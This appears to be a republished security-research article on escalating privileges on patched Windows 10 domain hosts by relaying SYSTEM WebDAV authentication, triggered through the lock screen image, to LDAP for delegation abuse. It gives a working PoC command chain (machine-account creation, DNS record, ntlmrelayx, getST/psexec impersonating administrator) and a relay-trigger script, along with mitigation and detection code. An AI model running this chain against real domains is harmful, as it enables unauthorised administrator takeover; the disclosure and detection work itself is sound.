

How to bypass the graphical interface dependency to achieve local privilege escalation on fully patched Win10 domain hosts

2025-02-25 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

This article shows how to bypass the graphical interface dependency and achieve local privilege escalation on a fully patched Windows 10 domain host. The content is concise and easy to follow; I hope you take something away from the detailed walkthrough below.

Objective

The purpose of this post is to show how to bypass the graphical interface dependency and achieve local privilege escalation on fully patched, domain-joined Windows 10 hosts. The attack itself is not new, but we have removed one of its dependencies and automated the process to simplify the operation.

Attack condition

As of this writing, an attacker still needs to meet the following conditions to compromise an Active Directory computer object with this technique:

An account with at least one ServicePrincipalName (SPN). This account will be configured as "allowed to act on behalf of other identity" (msDS-AllowedToActOnBehalfOfOtherIdentity) on the victim computer object and will be used to invoke the S4U2self and S4U2proxy extensions.

The WebDAV Redirector feature must be installed on the victim computer. The WebDAV client does not negotiate signing, so its authentication can be relayed to LDAP.

SMB authentication could also be relayed by abusing the recently discovered NTLM signing/MIC bypass, but Microsoft has since fixed it. [6] [7]

A DNS record that points to the attacker's machine. The WebDAV client only authenticates automatically to hosts in the Intranet zone, which means that using an IP address instead of a hostname does not work.

Access to the GUI to use the "Create your picture -> Browse for one" function of the profile picture settings. One of the steps is performed by SYSTEM (so the computer account authenticates on the network), and a WebDAV path can be specified (\\maliciousWebDav@80\pics\pic.jpg).

The following information is useful when trying to meet the above dependencies:

1. The default value of the Active Directory ms-DS-MachineAccountQuota attribute allows every domain user to add up to 10 computer accounts to the domain [4]. Computer accounts also have values in their ServicePrincipalName attribute, so the S4U extensions can be used with them.

2. On Windows 10 the WebDAV client is installed by default. On Windows Server 2012 R2 and earlier it requires the Desktop Experience feature, and on Windows Server 2016 and later the WebDAV Redirector feature must be installed manually.

3. By default, Authenticated Users hold a "Create all Child objects" ACE on the Active Directory Integrated DNS (ADIDNS) zone, which allows them to create new DNS records.

The first three conditions are easy to meet because they correspond to the default Active Directory and Windows configuration. The GUI dependency, however, is a frustrating limitation in our scenario.

Change the image from the command line

As a first approach we looked at using an API or a Windows command-line utility to change the profile picture, without success. However, we found that the same attack path is exposed by the operation that changes the lock screen image.

The screenshot below illustrates this.

Note: a few days before this article was published, Elad Shamir published a post saying that he had also discovered the lock screen image attack path. His research can be found in [12].

While studying the lock screen image feature we found that, in this case, an API can be used to change the lock screen image [3]. Using this API, we were finally able to trigger a SYSTEM network authentication from the command line.

We wrote a PowerShell script and a C# assembly that use this API. We called the utility Change-Lockscreen; it can be found at the following link:

https://github.com/nccgroup/Change-Lockscreen

The tool is pointed at the WebDAV path that serves the image, and Change-Lockscreen performs the actions that lead to the required network authentication.

Note that by default Windows 10 has a feature called Windows Spotlight, which automatically downloads and displays lock screen images. When this feature is enabled, Change-Lockscreen disables it and sets the image specified in the parameter (keep this in mind for OPSEC). If the user had instead set a static, custom lock screen image, Change-Lockscreen backs it up and restores it after the attack is complete.

Demo video: implementing an attack in Impacket

Initially we used the rbcd_relay.py delegation relay tool developed by 3xocyte (in collaboration with Elad Shamir) [5]. While it was useful in some of our test scenarios, it did not cover everything we needed, so we decided to build on 3xocyte's work and submit our additions to SecureAuth's Impacket project [13] as a pull request.

We added a new flag to ntlmrelayx called --serve-image. With this flag, ntlmrelayx serves the specified image to complete the attack.

In addition, to act as a WebDAV server it was necessary to implement the OPTIONS and PROPFIND methods in httprelayserver.py. The OPTIONS method tells the client that the PROPFIND method is supported and enabled. The PROPFIND request is the one that carries the NTLM authentication, so it is this request that is relayed to perform the attack (an example request is shown in the figure below).

Example usage:

ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user machine$ --serve-image ./spot.jpg

These features have been merged into Impacket and can be found at:

https://github.com/SecureAuthCorp/impacket
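As an added example that is not part of the original post or of Impacket, the following Python script replays the WebDAV exchange described above: OPTIONS advertising PROPFIND, then PROPFIND carrying the NTLM handshake. It also decodes the NegotiateFlags of the NTLM NEGOTIATE message so you can confirm that the client did not ask for signing, which is the property the relay to LDAP depends on. The host, paths, stub image and NTLM messages are constructed for the example; a real relay forwards the tokens to the LDAP target instead of answering with a synthetic challenge.

```python
"""Minimal WebDAV relay trigger: OPTIONS advertises PROPFIND, PROPFIND carries NTLM.

Added illustration, not code from NCC Group or Impacket. Host, paths, the stub
image and the NTLM messages are constructed for this example.
"""
import base64
import http.client
import struct
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# MS-NLMP NegotiateFlags; a client that sets either asks for message signing,
# which is what makes a relay to an LDAP server that enforces signing fail.
NTLMSSP_NEGOTIATE_SIGN = 0x00000010
NTLMSSP_NEGOTIATE_ALWAYS_SIGN = 0x00008000
IMAGE_BYTES = b"\xff\xd8\xff\xe0" + bytes(28)  # constructed JPEG-like stub, not a real picture


def parse_ntlm_token(authz_header):
    """Decode 'Authorization: NTLM <b64>' into (message_type, negotiate_flags); None if absent/invalid.

    NegotiateFlags are only read from NEGOTIATE_MESSAGE (type 1), where they sit at offset 12.
    """
    scheme, _, token = authz_header.partition(" ")
    if scheme.upper() != "NTLM" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    if len(raw) < 16 or raw[:8] != b"NTLMSSP\x00":
        return None
    msg_type, flags = struct.unpack_from("<II", raw, 8)
    return msg_type, (flags if msg_type == 1 else None)


def negotiates_signing(flags):
    """True when the NEGOTIATE_MESSAGE asks for signing (the WebDAV Redirector does not)."""
    return bool(flags & (NTLMSSP_NEGOTIATE_SIGN | NTLMSSP_NEGOTIATE_ALWAYS_SIGN))


def negotiate_message(flags):
    """Construct a minimal NEGOTIATE_MESSAGE with empty DomainName/Workstation fields."""
    return base64.b64encode(b"NTLMSSP\x00" + struct.pack("<II", 1, flags) + bytes(16)).decode()


def challenge_message(server_challenge=bytes(8)):
    """Construct a minimal CHALLENGE_MESSAGE; a real relay forwards the LDAP target's challenge instead."""
    body = struct.pack("<I", 2) + bytes(8) + struct.pack("<I", 0x00000205) + server_challenge + bytes(16)
    return base64.b64encode(b"NTLMSSP\x00" + body).decode()


def authenticate_message_stub():
    """Type 3 placeholder with zeroed fields; a relay server never validates its contents."""
    return base64.b64encode(b"NTLMSSP\x00" + struct.pack("<I", 3) + bytes(60)).decode()


class WebDavTrigger(BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"

    def _reply(self, code, body=b"", **headers):
        self.send_response(code)
        for name, value in headers.items():
            self.send_header(name.replace("_", "-"), value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        # The Redirector probes with OPTIONS; DAV/Allow headers tell it PROPFIND is supported.
        self._reply(200, DAV="1", Allow="OPTIONS, GET, PROPFIND", MS_Author_Via="DAV")

    def do_PROPFIND(self):
        token = parse_ntlm_token(self.headers.get("Authorization", ""))
        if token is None:
            # Demand NTLM; Windows (as SYSTEM, for an Intranet-zone host name) answers with NEGOTIATE.
            self._reply(401, WWW_Authenticate="NTLM")
        elif token[0] == 1:
            self.server.seen_flags.append(token[1])  # this is what a relay forwards to the LDAP target
            self._reply(401, WWW_Authenticate="NTLM " + challenge_message())
        else:
            # AUTHENTICATE: nothing is checked here; a relay forwards it and completes the LDAP bind.
            self.server.authenticated += 1
            self._reply(207, b"<?xml version='1.0'?><D:multistatus xmlns:D='DAV:'/>", Content_Type="text/xml")

    def do_GET(self):
        # After authentication the client fetches the picture itself (the --serve-image part).
        self._reply(200, IMAGE_BYTES, Content_Type="image/jpeg")

    def log_message(self, *args):
        pass  # keep the example quiet


def start_server():
    srv = HTTPServer(("127.0.0.1", 0), WebDavTrigger)
    srv.seen_flags, srv.authenticated = [], 0
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_client_exchange(port, client_flags):
    """Replay the Redirector's sequence: OPTIONS, anonymous PROPFIND, PROPFIND+NEGOTIATE, PROPFIND+AUTHENTICATE, GET."""
    steps = [
        ("OPTIONS", "/", {}),
        ("PROPFIND", "/pics/", {"Depth": "0"}),
        ("PROPFIND", "/pics/", {"Depth": "0", "Authorization": "NTLM " + negotiate_message(client_flags)}),
        ("PROPFIND", "/pics/", {"Depth": "0", "Authorization": "NTLM " + authenticate_message_stub()}),
        ("GET", "/pics/pic.jpg", {}),
    ]
    conn = http.client.HTTPConnection("127.0.0.1", port)
    results = []
    for method, path, headers in steps:
        conn.request(method, path, headers=headers)
        resp = conn.getresponse()
        resp.read()
        results.append((method, resp.status, resp.getheader("WWW-Authenticate")))
    conn.close()
    return results


if __name__ == "__main__":
    server = start_server()
    for step in run_client_exchange(server.server_address[1], 0x00000205):
        print(step)
    print("client asked for signing:", [negotiates_signing(f) for f in server.seen_flags])
    server.shutdown()
```

Run it directly to see the five responses; the interesting output is the last line, which shows whether the recorded NEGOTIATE flags contained NTLMSSP_NEGOTIATE_SIGN or NTLMSSP_NEGOTIATE_ALWAYS_SIGN. A client that sets them (for example SMB) can still be relayed to a domain controller that merely supports signing, but not to one that requires it.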

PoC

The following is a video demonstration of using Change-Lockscreen and ntlmrelayx attacks:

The following steps correspond to the above video content:

1. We need an account with a value in its ServicePrincipalName attribute to call S4U2self and S4U2proxy. We can abuse the default Active Directory ms-DS-MachineAccountQuota attribute to add a computer account to the domain and use it (Powermad [11]):

$pass = ConvertTo-SecureString 'NCC12344th' -AsPlainText -Force; New-MachineAccount -MachineAccount s4umachine -Password $pass

2. We must create a DNS record (ImageServer.capsule.corp) that points to the attacker's machine (attacker IP). The credential uses the computer account's sAMAccountName, which carries the trailing $:

$cred = New-Object System.Management.Automation.PSCredential ("CAPSULE\s4umachine$", $pass); Invoke-DNSUpdate -DNSType A -DNSName ImageServer.capsule.corp -DNSData 10.10.11.137 -Credential $cred -Realm capsule.corp

3. We trigger a network authentication from the file server's computer account by changing the lock screen image as a low-privileged user on that host:

Change-Lockscreen -Webdav \\imageserver@80\

4. With ntlmrelayx, the authentication is relayed to LDAP, which lets us modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the machine:

ntlmrelayx.py -t ldap://dc01.capsule.corp --delegate-access --escalate-user s4umachine$ --serve-image ./spot.jpg

5. Now we can use the trusted computer account (S4UMachine$, with the password set in step 1) to impersonate any user against any service on the file server:

getST.py capsule/s4umachine$:NCC12344th -spn cifs/fileserver.capsule.corp -impersonate administrator -dc-ip 10.10.11.128
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass fileserver.capsule.corp

The following short video shows you the steps involved in the attack in a graphical and conceptual way.

Mitigation and detection

The following points can help mitigate and detect such attacks:

Because this attack relies on a computer configuring Kerberos resource-based constrained delegation for itself, adding a deny ACE that prevents a computer account from writing its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute reduces this attack surface.

Setting an appropriate SACL on the msDS-AllowedToActOnBehalfOfOtherIdentity attribute helps detect changes to it.

Finally, enforcing LDAP signing and LDAP channel binding mitigates the authentication relay performed in this attack.
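The following Python script is an added example, not part of the original post, showing what the SACL recommendation above yields in practice. With auditing on the attribute, each write produces Security event 5136 (a directory service object was modified); this example assumes the AttributeValue of that event is rendered as the hex encoding of the security descriptor, decodes the trustee SIDs from it, and flags the pattern this attack leaves, namely a computer account writing the attribute on its own object. The log lines, the simplified key=value export format and the SIDs are constructed for the example.

```python
"""Detect msDS-AllowedToActOnBehalfOfOtherIdentity changes in Windows Security event 5136.

Added illustration, not code from the original post. The log lines, the
key=value export format and all SIDs are constructed for the example; the
AttributeValue is assumed to be the hex encoding of the security descriptor.
"""
import re
import struct

SE_DACL_PRESENT = 0x0004
ACCESS_ALLOWED_ACE_TYPE = 0x00
RBCD_ATTRIBUTE = "msDS-AllowedToActOnBehalfOfOtherIdentity"
OPERATION_NAMES = {"%%14674": "Value Added", "%%14675": "Value Deleted"}


def build_sid(sid_text):
    """Encode 'S-1-5-21-...' as a binary SID: revision, count, 48-bit big-endian authority, LE sub-authorities."""
    parts = sid_text.split("-")
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", int(parts[1]), len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def parse_sid(buf, off):
    """Decode a binary SID at offset off back into its string form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def build_rbcd_descriptor(sid_text):
    """Construct a self-relative security descriptor with one full-control allow ACE for the trustee."""
    sid = build_sid(sid_text)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), 0x000F01FF) + sid
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(ace), 1, 0) + ace  # ACL_REVISION_DS, one ACE
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | 0x8000, 0, 0, 0, 20)  # DACL at offset 20
    return header + acl


def allowed_principals(sd_hex):
    """Return the trustee SIDs of ACCESS_ALLOWED ACEs in a hex-encoded self-relative security descriptor."""
    sd = bytes.fromhex(sd_hex)
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(parse_sid(sd, off + 8))
        off += ace_size
    return sids


FIELD_RE = re.compile(r"(\w+)=(\S+)")


def find_rbcd_changes(lines):
    """Return one finding per 5136 event that touches the RBCD attribute."""
    findings = []
    for line in lines:
        ev = dict(FIELD_RE.findall(line))
        if ev.get("EventID") != "5136" or ev.get("AttributeLDAPDisplayName") != RBCD_ATTRIBUTE:
            continue
        subject = ev.get("SubjectUserName", "")
        target_cn = ev.get("ObjectDN", "").split(",")[0]
        if target_cn.upper().startswith("CN="):
            target_cn = target_cn[3:]
        findings.append({
            "subject": subject,
            "object": ev.get("ObjectDN", ""),
            "operation": OPERATION_NAMES.get(ev.get("OperationType"), ev.get("OperationType")),
            "principals": allowed_principals(ev["AttributeValue"]) if ev.get("AttributeValue") else [],
            # A computer account granting delegation on its own object is the signature of this relay attack.
            "self_modification": subject.endswith("$") and subject[:-1].upper() == target_cn.upper(),
        })
    return findings


# Constructed sample export; the domain SID and the attacker's s4umachine$ RID are made up.
S4UMACHINE_SID = "S-1-5-21-1004336348-1177238915-682003330-1105"
SAMPLE_EVENTS = [
    "EventID=5136 SubjectUserName=FILESERVER$ SubjectDomainName=CAPSULE "
    "ObjectDN=CN=FILESERVER,CN=Computers,DC=capsule,DC=corp ObjectClass=computer "
    "AttributeLDAPDisplayName=" + RBCD_ATTRIBUTE + " OperationType=%%14674 "
    "AttributeValue=" + build_rbcd_descriptor(S4UMACHINE_SID).hex(),
    "EventID=5136 SubjectUserName=svc_backup SubjectDomainName=CAPSULE "
    "ObjectDN=CN=WS01,CN=Computers,DC=capsule,DC=corp ObjectClass=computer "
    "AttributeLDAPDisplayName=description OperationType=%%14674 AttributeValue=Reimaged",
    "EventID=4624 SubjectUserName=FILESERVER$ LogonType=3",
]

if __name__ == "__main__":
    for finding in find_rbcd_changes(SAMPLE_EVENTS):
        print(finding)
```

The self_modification flag is the high-signal condition: legitimate RBCD changes are made by administrators or provisioning accounts, whereas the relayed authentication in this attack makes the victim computer account the subject of its own modification. Decoding the trustee SIDs additionally tells you which account (here the freshly created machine account) was granted delegation, which is what you need to revoke.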
